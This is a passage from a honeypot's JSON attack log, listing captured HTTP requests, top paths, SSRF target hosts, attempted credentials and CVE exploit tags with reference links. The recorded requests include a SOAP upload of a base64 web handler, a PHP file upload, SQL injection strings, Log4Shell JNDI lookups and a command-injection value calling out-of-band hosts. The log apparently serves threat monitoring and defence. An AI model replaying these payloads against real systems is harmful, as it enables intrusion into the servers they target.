name=\"upload\"\r\n\r\nupload\r\n------WebKitFormBoundaryAVuAKsvesmnWtgEP--\r\n","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/ajax/getemaildata.php?DontCheckLogin=1","summary":"","payload_hex":"504f5354202f616a61782f676574656d61696c646174612e7068703f446f6e74436865636b4c6f67696e3d3120485454502f312e310d0a486f73743a20<HONEYPOT>3a323337350d0a557365722d4167656e743a204d6f7a696c6c612f352e30202857696e646f7773204e542031302e303b20574f57363429204170706c655765624b69742f3533372e333620284b48544d4c2c206c696b65204765636b6f29204368726f6d652f34352e302e323435342e3933205361666172692f3533372e33360d0a436f6e74656e742d4c656e6774683a203332310d0a4163636570743a20746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c696d6167652f776562702c2a2f2a3b713d302e380d0a4163636570742d456e636f64696e673a20677a69702c206465666c6174650d0a4163636570742d4c616e67756167653a207a682d434e2c7a683b713d302e380d0a43616368652d436f6e74726f6c3a206d61782d6167653d300d0a436f6e74656e742d547970653a206d756c7469706172742f666f726d2d646174613b20626f756e646172793d2d2d2d2d5765624b6974466f726d426f756e64617279415675414b737665736d6e57746745500d0a436f6f6b69653a205048505345535349443d696272753770716e706c686937323063617130657638757674300d0a4f726967696e3a206e756c6c0d0a557067726164652d496e7365637572652d52657175657374733a20310d0a0d0a2d2d2d2d2d2d5765624b6974466f726d426f756e64617279415675414b737665736d6e57746745500d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2266696c65223b2066696c656e616d653d2225732e70687020220d0a436f6e74656e742d547970653a206170706c69636174696f6e2f6f637465742d73747265616d0d0a0d0a334845694d5443546f795a305938656352716847335071477136690d0a2d2d2d2d2d2d5765624b6974466f726d426f756e64617279415675414b737665736d6e57746745500d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2275706c6f6164220d0a0d0a75706c6f61640d0a2d2d2d2d2d2d5765624b6974466f726d426f756e64617279415675414b737665736d6e57746745502d2d0d0a","method":"POST","user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36","ja3":"","session":"6703ebf9-c46c-4028-a072-25b002143aa7","seq":6,"duration_ms":10851,"bytes_in":4380,"bytes_out":462},{"timestamp":"2026-07-30T21:10:57","port":2375,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept-encoding\":\"gzip\",\"host\":\"<HONEYPOT>:2375\",\"user-agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/uapim/static/pages/30/head.jsp","summary":"","payload_hex":"474554202f756170696d2f7374617469632f70616765732f33302f686561642e6a737020485454502f312e310d0a486f73743a20<HONEYPOT>3a323337350d0a557365722d4167656e743a204d6f7a696c6c612f352e3020284d6163696e746f73683b20496e74656c204d6163204f5320582031305f31355f3729204170706c655765624b69742f3630352e312e313520284b48544d4c2c206c696b65204765636b6f292056657273696f6e2f31362e35205361666172692f3630352e312e31350d0a4163636570742d456e636f64696e673a20677a69700d0a0d0a","method":"GET","user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15","ja3":"","session":"6703ebf9-c46c-4028-a072-25b002143aa7","seq":5,"duration_ms":9848,"bytes_in":3482,"bytes_out":385},{"timestamp":"2026-07-30T21:10:55","port":2375,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"HELP ACIDBITCHEZ\r\n","payload_hex":"48454c5020414349444249544348455a0d0a","method":"","user_agent":"","ja3":"","session":"40949aa8-5b3f-4c43-9627-3c576bde9323","seq":1,"duration_ms":100,"bytes_in":18,"bytes_out":12,"enriched":{"digest":"eee5eed92944ddf6","strings":["HELP ACIDBITCHEZ"]}},{"timestamp":"2026-07-30T21:10:53","port":2375,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept-encoding\":\"gzip\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"<HONEYPOT>:2375\",\"user-agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Safari/605.1.15\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/3HEiMTeUlbF4RUByn1bqIx2rt9o.jsp","summary":"","payload_hex":"474554202f334845694d5465556c624634525542796e3162714978327274396f2e6a737020485454502f312e310d0a486f73743a20<HONEYPOT>3a323337350d0a557365722d4167656e743a204d6f7a696c6c612f352e3020284d6163696e746f73683b20496e74656c204d6163204f5320582031305f31355f3729204170706c655765624b69742f3630352e312e313520284b48544d4c2c206c696b65204765636b6f292056657273696f6e2f31362e352e31205361666172692f3630352e312e31350d0a4163636570742d456e636f64696e673a20677a69700d0a436f6e74656e742d547970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a0d0a","method":"GET","user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Safari/605.1.15","ja3":"","session":"6703ebf9-c46c-4028-a072-25b002143aa7","seq":4,"duration_ms":5851,"bytes_in":3253,"bytes_out":308},{"timestamp":"2026-07-30T21:10:52","port":2375,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept-encoding\":\"gzip\",\"content-length\":\"1803\",\"content-type\":\"text/xml; charset=utf-8\",\"host\":\"<HONEYPOT>:2375\",\"soapaction\":\"\\\"http://tempuri.org/SaveFile\\\"\",\"user-agent\":\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36\"}","body":"<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n  <soap:Body>\r\n  <SaveFile xmlns=\"http://tempuri.org/\">\r\n    <binData>PCVAIFdlYkhhbmRsZXIgTGFuZ3VhZ2U9IkMjIiBDbGFzcz0iRGVsZXRlQ3VycmVudEZpbGUiICU+DQoNCiAgICB1c2luZyBTeXN0ZW07DQogICAgdXNpbmcgU3lzdGVtLldlYjsNCiAgICB1c2luZyBTeXN0ZW0uSU87DQoNCiAgICBwdWJsaWMgY2xhc3MgRGVsZXRlQ3VycmVudEZpbGUgOiBJSHR0cEhhbmRsZXIgew0KICAgICAgICANCiAgICAgICAgcHVibGljIHZvaWQgUHJvY2Vzc1JlcXVlc3QgKEh0dHBDb250ZXh0IGNvbnRleHQpIHsNCiAgICAgICAgICAgIGludCByZXN1bHQgPSAxMTExICogMjIyMjsNCiAgICAgICAgICAgIGNvbnRleHQuUmVzcG9uc2UuQ29udGVudFR5cGUgPSAidGV4dC9wbGFpbiI7DQogICAgICAgICAgICBjb250ZXh0LlJlc3BvbnNlLldyaXRlKHJlc3VsdCk7DQoNCiAgICAgICAgICAgIHN0cmluZyBmaWxlUGF0aCA9IGNvbnRleHQuU2VydmVyLk1hcFBhdGgoY29udGV4dC5SZXF1ZXN0LkN1cnJlbnRFeGVjdXRpb25GaWxlUGF0aCk7DQogICAgICAgICAgICBpZiAoRmlsZS5FeGlzdHMoZmlsZVBhdGgpKSB7DQogICAgICAgICAgICAgICAgdHJ5IHsNCiAgICAgICAgICAgICAgICAgICAgRmlsZS5EZWxldGUoZmlsZVBhdGgpOw0KICAgICAgICAgICAgICAgICAgICBjb250ZXh0LlJlc3BvbnNlLldyaXRlKCJcbkZpbGUgZGVsZXRlZCBzdWNjZXNzZnVsbHkuIik7DQogICAgICAgICAgICAgICAgfSBjYXRjaCAoRXhjZXB0aW9uIGV4KSB7DQogICAgICAgICAgICAgICAgICAgIGNvbnRleHQuUmVzcG9uc2UuV3JpdGUoIlxuRXJyb3IgZGVsZXRpbmcgZmlsZTogIiArIGV4Lk1lc3NhZ2UpOw0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0gZWxzZSB7DQogICAgICAgICAgICAgICAgY29udGV4dC5SZXNwb25zZS5Xcml0ZSgiXG5GaWxlIG5vdCBmb3VuZC4iKTsNCiAgICAgICAgICAgIH0NCiAgICAgICAgfQ0KICAgIA0KICAgICAgICBwdWJsaWMgYm9vbCBJc1JldXNhYmxlIHsNCiAgICAgICAgICAgIGdldCB7DQogICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOw0K             fQ0KICAgICAgICB9DQogICAgfQ==</binData>\r\n    <path>./</path>\r\n    <fileName>RxpCa.ashx</fileName>\r\n  </SaveFile>\r\n  </soap:Body>\r\n</soap:Envelope>","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/CS/Office/AutoUpdates/PatchFile.asmx","summary":"","payload_hex":"504f5354202f43532f4f66666963652f4175746f557064617465732f506174636846696c652e61736d7820485454502f312e310d0a486f73743a20<HONEYPOT>3a323337350d0a557365722d4167656e743a204d6f7a696c6c612f352e3020285831313b204c696e7578207838365f363429204170706c655765624b69742f3533372e333620284b48544d4c2c206c696b65204765636b6f29204368726f6d652f3133322e302e302e30205361666172692f3533372e33360d0a436f6e74656e742d4c656e6774683a20313830330d0a436f6e74656e742d547970653a20746578742f786d6c3b20636861727365743d7574662d380d0a534f4150416374696f6e3a2022687474703a2f2f74656d707572692e6f72672f5361766546696c65220d0a4163636570742d456e636f64696e673a20677a69700d0a0d0a3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d227574662d38223f3e0d0a3c736f61703a456e76656c6f706520786d6c6e733a7873693d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d612d696e7374616e63652220786d6c6e733a7873643d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d612220786d6c6e733a736f61703d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e76656c6f70652f223e0d0a20203c736f61703a426f64793e0d0a20203c5361766546696c6520786d6c6e733d22687474703a2f2f74656d707572692e6f72672f223e0d0a202020203c62696e446174613e504356414946646c596b6868626d52735a584967544746755a3356685a325539496b4d6a496942446247467a637a3069524756735a58526c51335679636d567564455a70624755694943552b44516f4e436941674943423163326c755a79425465584e305a57303744516f674943416764584e70626d636755336c7a644756744c6c646c596a734e436941674943423163326c755a79425465584e305a5730755355383744516f4e436941674943427764574a7361574d675932786863334d67524756735a58526c51335679636d567564455a70624755674f69424a5348523063456868626d52735a5849676577304b49434167494341674943414e4369416749434167494341676348566962476c6a49485a766157516755484a765932567a63314a6c6358566c633351674b45683064484244623235305a58683049474e76626e526c654851704948734e4369416749434167494341674943416749476c75644342795a584e3162485167505341784d54457849436f674d6a49794d6a734e4369416749434167494341674943416749474e76626e526c65485175556d567a634739756332557551323975644756756446523563475567505341696447563464433977624746706269493744516f674943416749434167494341674943426a623235305a5868304c6c4a6c63334276626e4e6c4c6c64796158526c4b484a6c6333567364436b3744516f4e4369416749434167494341674943416749484e30636d6c755a79426d6157786c554746306143413949474e76626e526c6548517555325679646d56794c6b3168634642686447676f5932397564475634644335535a5846315a584e304c6b4e31636e4a6c626e52466547566a64585270623235476157786c5547463061436b3744516f67494341674943416749434167494342705a69416f526d6c735a53354665476c7a64484d6f5a6d6c735a564268644767704b53423744516f67494341674943416749434167494341674943416764484a354948734e43694167494341674943416749434167494341674943416749434167526d6c735a5335455a57786c6447556f5a6d6c735a564268644767704f77304b4943416749434167494341674943416749434167494341674943426a623235305a5868304c6c4a6c63334276626e4e6c4c6c64796158526c4b434a63626b5a70624755675a4756735a58526c5a43427a64574e6a5a584e7a5a6e567362486b7549696b3744516f6749434167494341674943416749434167494341676653426a5958526a6143416f5258686a5a58423061573975494756344b53423744516f6749434167494341674943416749434167494341674943416749474e76626e526c65485175556d567a634739756332557556334a706447556f496c787552584a79623349675a4756735a585270626d63675a6d6c735a546f6749694172494756344c6b316c63334e685a3255704f77304b49434167494341674943416749434167494341674948304e43694167494341674943416749434167494830675a57787a5a53423744516f6749434167494341674943416749434167494341675932397564475634644335535a584e776232357a5a533558636d6c305a536769584735476157786c494735766443426d623356755a4334694b54734e436941674943416749434167494341674948304e4369416749434167494341676651304b494341674941304b49434167494341674943427764574a7361574d67596d39766243424a63314a6c64584e68596d786c4948734e436941674943416749434167494341674947646c6443423744516f674943416749434167494341674943416749434167636d563064584a7549475a6862484e6c4f77304b202020202020202020202020206651304b49434167494341674943423944516f674943416766513d3d3c2f62696e446174613e0d0a202020203c706174683e2e2f3c2f706174683e0d0a202020203c66696c654e616d653e52787043612e617368783c2f66696c654e616d653e0d0a20203c2f5361766546696c653e0d0a20203c2f736f61703a426f64793e0d0a3c2f736f61703a456e76656c6f70653e","method":"POST","user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36","ja3":"","session":"6703ebf9-c46c-4028-a072-25b002143aa7","seq":3,"duration_ms":4848,"bytes_in":2972,"bytes_out":231}],"http_methods":[{"method":"GET","count":1014},{"method":"POST","count":821},{"method":"PUT","count":8},{"method":"DELETE","count":4},{"method":"PATCH","count":3}],"distinct_ports_total":8,"top_paths":[{"path":"/","count":187,"ports":1},{"path":"/wp-admin/admin-ajax.php","count":49,"ports":1},{"path":"/login","count":13,"ports":1},{"path":"/4uLRFS","count":12,"ports":1},{"path":"/login.php","count":7,"ports":1},{"path":"/files/HgmrwsSm.php","count":6,"ports":1},{"path":"/_ignition/execute-solution","count":6,"ports":1},{"path":"/nagiosxi/login.php","count":6,"ports":1},{"path":"/app","count":6,"ports":1},{"path":"/api/v1/database/4","count":5,"ports":1},{"path":"/api/v1/database/10","count":5,"ports":1},{"path":"/api/v1/database/7","count":5,"ports":1},{"path":"/api/v1/database/1","count":5,"ports":1},{"path":"/api/v1/database/6","count":5,"ports":1},{"path":"/index.php","count":5,"ports":1}],"distinct_paths_total":200,"top_snis":[],"top_hosts":[{"value":"169.254.169.254","count":7},{"value":"aws.oast.online","count":7},{"value":"alibaba.oast.pro","count":2},{"value":"localhost","count":2},{"value":"100.100.100.200","count":2},{"value":"a/?x=","count":1},{"value":"[:","count":1},{"value":"2852039166","count":1},{"value":"169.254.169.254.nip.io","count":1},{"value":"BmCDoBeiy9qZ3eKc.invalid","count":1},{"value":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA","count":1},{"value":"' *; host d9lls2olfui3elj6aai0tgpb4fewrbgcy.oast.live; '","count":1}],"top_alpns":[],"banners":[{"value":"SSH-2.0-Go","count":1}],"credentials":[{"username":"","password":"admin","count":3},{"username":"admin' or '1'='1","password":"1","count":2},{"username":"admin","password":"admin?show+webmaster+user","count":2},{"username":"admin%27+or+%271%27%3D%271%27%23","password":"admin%27+or+%271%27%3D%271%27%23","count":2},{"username":"Log+in","password":"","count":2},{"username":"fqime","password":"LyHmi8upMv5X!","count":1},{"username":"test'%20AND%20(SELECT%208979%20FROM%20(SELECT(SLEEP(10-(IF(ORD(M","password":"","count":1},{"username":"${jndi:ldap://${:-893}${:-686}.${hostName}.username.d9lpkgglfui3","password":"2DBzK","count":1},{"username":"","password":"null","count":1},{"username":"${jndi:ldap://${:-617}${:-847}.${hostName}.username.d9lpkgglfui3","password":"admin","count":1}],"header_profile":{"signature":["Accept","Accept-Encoding","Accept-Language","Cache-Control","Content-Length","Content-Type","Cookie","Host","Origin","Upgrade-Insecure-Requests","User-Agent"],"representative":[{"name":"Accept","value":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","notable":false},{"name":"Accept-Encoding","value":"gzip, deflate","notable":false},{"name":"Accept-Language","value":"zh-CN,zh;q=0.8","notable":false},{"name":"Cache-Control","value":"max-age=0","notable":false},{"name":"Content-Length","value":"321","notable":false},{"name":"Content-Type","value":"multipart/form-data; boundary=----WebKitFormBoundaryAVuAKsvesmnWtgEP","notable":true},{"name":"Cookie","value":"PHPSESSID=ibru7pqnplhi720caq0ev8uvt0","notable":true},{"name":"Host","value":"<HONEYPOT>:2375","notable":false},{"name":"Origin","value":"null","notable":true},{"name":"Upgrade-Insecure-Requests","value":"1","notable":false},{"name":"User-Agent","value":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36","notable":false}],"distinct_sets":4,"events_with_headers":4},"tags":[{"tag_id":"CVE-2017-9841","tag_type":"cve","title":"PHPUnit - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/phpunit/phpunit/src/Util/PHP/eval-stdin.php","reference_urls":["https://github.com/cyberharsh/Php-unit-CVE-2017-9841","https://github.com/RandomRobbieBF/phpunit-brute","https://thephp.cc/articles/phpunit-a-security-risk","https://twitter.com/sec715/status/1411517028012158976","https://nvd.nist.gov/vuln/detail/CVE-2017-9841"]},{"tag_id":"CVE-2018-10562","tag_type":"cve","title":"Dasan GPON Devices - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/GponForm/diag_Form","reference_urls":["https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router","https://github.com/f3d0x0/GPON/blob/master/gpon_rce.py","https://nvd.nist.gov/vuln/detail/CVE-2018-10562","https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/","https://github.com/ethicalhackeragnidhra/GPON"]},{"tag_id":"CVE-2018-6961","tag_type":"cve","title":"VMware NSX SD-WAN Edge - Command Injection","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/scripts/ajaxPortal.lua","reference_urls":["https://www.vmware.com/security/advisories/VMSA-2018-0011.html","https://www.exploit-db.com/exploits/44959","https://nvd.nist.gov/vuln/detail/CVE-2018-6961"]},{"tag_id":"CVE-2020-5902","tag_type":"cve","title":"F5 BIG-IP TMUI - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/tmui/locallb/workspace/tmshCmd.jsp","reference_urls":["http://packetstormsecurity.com/files/158333/BIG-IP-TMUI-Remote-Code-Execution.html","http://packetstormsecurity.com/files/158334/BIG-IP-TMUI-Remote-Code-Execution.html","http://packetstormsecurity.com/files/158366/F5-BIG-IP-TMUI-Directory-Traversal-File-Upload-Code-Execution.html","http://packetstormsecurity.com/files/158414/Checker-CVE-2020-5902.html","http://packetstormsecurity.com/files/158581/F5-Big-IP-13.1.3-Build-0.0.6-Local-File-Inclusion.html"]},{"tag_id":"CVE-2020-7961","tag_type":"cve","title":"Liferay Portal Unauthenticated < 7.2.1 CE GA2 - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/api/jsonws/invoke","reference_urls":["https://www.synacktiv.com/en/publications/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html","https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html","https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271","https://nvd.nist.gov/vuln/detail/CVE-2020-7961","http://packetstormsecurity.com/files/157254/Liferay-Portal-Java-Unmarshalling-Remote-Code-Execution.html"]},{"tag_id":"CVE-2021-3129","tag_type":"cve","title":"Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/_ignition/execute-solution","reference_urls":["https://www.ambionics.io/blog/laravel-debug-rce","https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129","https://nvd.nist.gov/vuln/detail/CVE-2021-3129","https://github.com/facade/ignition/pull/334","https://github.com/d4n-sec/d4n-sec.github.io"]},{"tag_id":"CVE-2021-40539","tag_type":"cve","title":"Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/./RestAPI/LogonCustomization","reference_urls":["https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis","https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html","https://github.com/synacktiv/CVE-2021-40539","https://nvd.nist.gov/vuln/detail/CVE-2021-40539","https://www.manageengine.com"]},{"tag_id":"CVE-2022-22947","tag_type":"cve","title":"Spring Cloud Gateway Code Injection","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/actuator/gateway/refresh","reference_urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-22947","https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/","https://github.com/wdahlenburg/spring-gateway-demo","https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published","https://tanzu.vmware.com/security/cve-2022-22947"]},{"tag_id":"CVE-2022-24816","tag_type":"cve","title":"GeoServer <1.2.2 - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/geoserver/wms","reference_urls":["https://www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver.html","https://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rx","https://github.com/geosolutions-it/jai-ext/commit/cb1d6565d38954676b0a366da4f965fef38da1cb","https://nvd.nist.gov/vuln/detail/CVE-2022-24816","https://github.com/tanjiti/sec_profile"]},{"tag_id":"CVE-2022-35914","tag_type":"cve","title":"GLPI <=10.0.2 - Remote Command Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/vendor/htmlawed/htmlawed/htmLawedTest.php","reference_urls":["https://mayfly277.github.io/posts/GLPI-htmlawed-CVE-2022-35914","https://github.com/cosad3s/CVE-2022-35914-poc","http://www.bioinformatics.org/phplabware/sourceer/sourceer.php?&Sfs=htmLawedTest.php&Sl=.%2Finternal_utilities%2FhtmLawed","https://nvd.nist.gov/vuln/detail/CVE-2022-35914","https://github.com/glpi-project/glpi/releases"]},{"tag_id":"CVE-2022-37042","tag_type":"cve","title":"Zimbra Collaboration Suite 8.8.15/9.0 - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/zimbraAdmin/0MVzAe6pgwe5go1D.jsp","reference_urls":["https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/","https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability/","https://github.com/vnhacker1337/CVE-2022-27925-PoC","https://nvd.nist.gov/vuln/detail/CVE-2022-37042","https://wiki.zimbra.com/wiki/Security_Center"]},{"tag_id":"CVE-2023-1389","tag_type":"cve","title":"TP-Link Archer AX21 (AX1800) - Unauthenticated Command Injection","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/cgi-bin/luci/;stok=/locale?form=country","reference_urls":["https://www.tenable.com/security/research/tra-2023-11","https://nvd.nist.gov/vuln/detail/CVE-2023-1389","https://github.com/tenable/poc-cve-2023-1389"]},{"tag_id":"CVE-2023-20198","tag_type":"cve","title":"Cisco IOS XE Web UI - Command Injection","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/%2577eb%2575i_%2577sma_Http","reference_urls":["https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z","https://www.rapid7.com/blog/post/2023/10/16/etr-cisco-ios-xe-web-ui-cve-2023-20198-active-exploitation/"]},{"tag_id":"CVE-2023-22515","tag_type":"cve","title":"Atlassian Confluence - Privilege Escalation","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/setup/setupadministrator-start.action","reference_urls":["https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis","https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html","https://confluence.atlassian.com/kb/faq-for-cve-2023-22515-1295682188.html","https://jira.atlassian.com/browse/CONFSERVER-92475","https://www.cisa.gov/news-events/alerts/2023/10/05/cisa-adds-three-known-exploited-vulnerabilities-catalog"]},{"tag_id":"CVE-2023-27524","tag_type":"cve","title":"Apache Superset - Authentication Bypass","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/api/v1/database","reference_urls":["https://github.com/horizon3ai/CVE-2023-27524","https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/","https://nvd.nist.gov/vuln/detail/CVE-2023-27524","http://packetstormsecurity.com/files/172522/Apache-Superset-2.0.0-Authentication-Bypass.html","http://www.openwall.com/lists/oss-security/2023/04/24/2"]},{"tag_id":"CVE-2023-29357","tag_type":"cve","title":"Microsoft SharePoint - Authentication Bypass","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/_api/web/siteusers","reference_urls":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29357","https://srcincite.io/advisories/src-2020-0022/","https://github.com/Chocapikk/CVE-2023-29357","https://sec.vnpt.vn/2023/08/phan-tich-cve-2023-29357-microsoft-sharepoint-validatetokenissuer-authentication-bypass-vulnerability/","https://starlabs.sg/blog/2023/09-sharepoint-pre-auth-rce-chain/"]},{"tag_id":"CVE-2023-34362","tag_type":"cve","title":"MOVEit Transfer - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/moveitisapi/moveitisapi.dll","reference_urls":["https://github.com/horizon3ai/CVE-2023-34362","https://www.horizon3.ai/moveit-transfer-cve-2023-34362-deep-dive-and-indicators-of-compromise/","https://nvd.nist.gov/vuln/detail/CVE-2023-34362","http://packetstormsecurity.com/files/172883/MOVEit-Transfer-SQL-Injection-Remote-Code-Execution.html","http://packetstormsecurity.com/files/173110/MOVEit-SQL-Injection.html"]},{"tag_id":"CVE-2023-46747","tag_type":"cve","title":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/mgmt/tm/auth/user","reference_urls":["https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/","https://my.f5.com/manage/s/article/K000137353","http://packetstormsecurity.com/files/175673/F5-BIG-IP-TMUI-AJP-Smuggling-Remote-Command-Execution.html","https://www.secpod.com/blog/f5-issues-warning-big-ip-vulnerability-used-in-active-exploit-chain/","https://github.com/f1tao/awesome-iot-security-resource"]},{"tag_id":"CVE-2025-31161","tag_type":"cve","title":"CrushFTP - Authentication Bypass","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/WebInterface/function","reference_urls":["https://projectdiscovery.io/blog/crushftp-authentication-bypass/","https://www.rapid7.com/blog/post/2025/03/25/etr-notable-vulnerabilities-in-next-js-cve-2025-29927/","https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update","https://nvd.nist.gov/vuln/detail/CVE-2025-31161"]},{"tag_id":"CVE-2025-54236","tag_type":"cve","title":"Adobe Commerce - Authentication Bypass","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/customer/address_file/upload","reference_urls":["https://slcyber.io/assetnote-security-research-center/why-nested-deserialization-is-still-harmful-magento-rce-cve-2025-54236/?v=2","https://sansec.io/research/sessionreaper"]},{"tag_id":"CVE-2025-59287","tag_type":"cve","title":"Windows Server Update Service - Insecure Deserialization","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/ReportingWebService/ReportingWebService.asmx","reference_urls":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59287","https://www.huntress.com/blog/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability","https://hawktrace.com/blog/CVE-2025-59287","https://research.eye.security/wsus-deserialization-exploit-in-the-wild-cve-2025-59287","https://unit42.paloaltonetworks.com/microsoft-cve-2025-59287/"]},{"tag_id":"CVE-2026-21643","tag_type":"cve","title":"Fortinet FortiClientEMS 7.4.4 - SQL Injection","severity":"CRITICAL","actively_exploited":true,"match_field":"url_path","matched_pattern":"/api/v1/init_consts","reference_urls":[]},{"tag_id":"CVE-2026-23760","tag_type":"cve","title":"SmarterTools SmarterMail - Admin Password Reset","severity":"CRITICAL","actively_exploited":true,"match_field":"url_path","matched_pattern":"/api/v1/auth/force-reset-password","reference_urls":[]},{"tag_id":"CVE-2026-34197","tag_type":"cve","title":"Apache ActiveMQ - Remote Code Execution","severity":"CRITICAL","actively_exploited":true,"match_field":"url_path","matched_pattern":"/api/jolokia/","reference_urls":[]},{"tag_id":"CVE-2017-18349","tag_type":"cve","title":"Fastjson Insecure Deserialization - Remote Code Execution","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/deserialize","reference_urls":["https://nvd.nist.gov/vuln/detail/CVE-2017-18349","https://github.com/alibaba/fastjson/wiki/security_update_20170315","https://github.com/pippo-java/pippo/issues/466","https://github.com/h0cksr/Fastjson--CVE-2017-18349-","https://fortiguard.com/encyclopedia/ips/44059"]},{"tag_id":"CVE-2019-17444","tag_type":"cve","title":"Jfrog Artifactory <6.17.0 - Default Admin 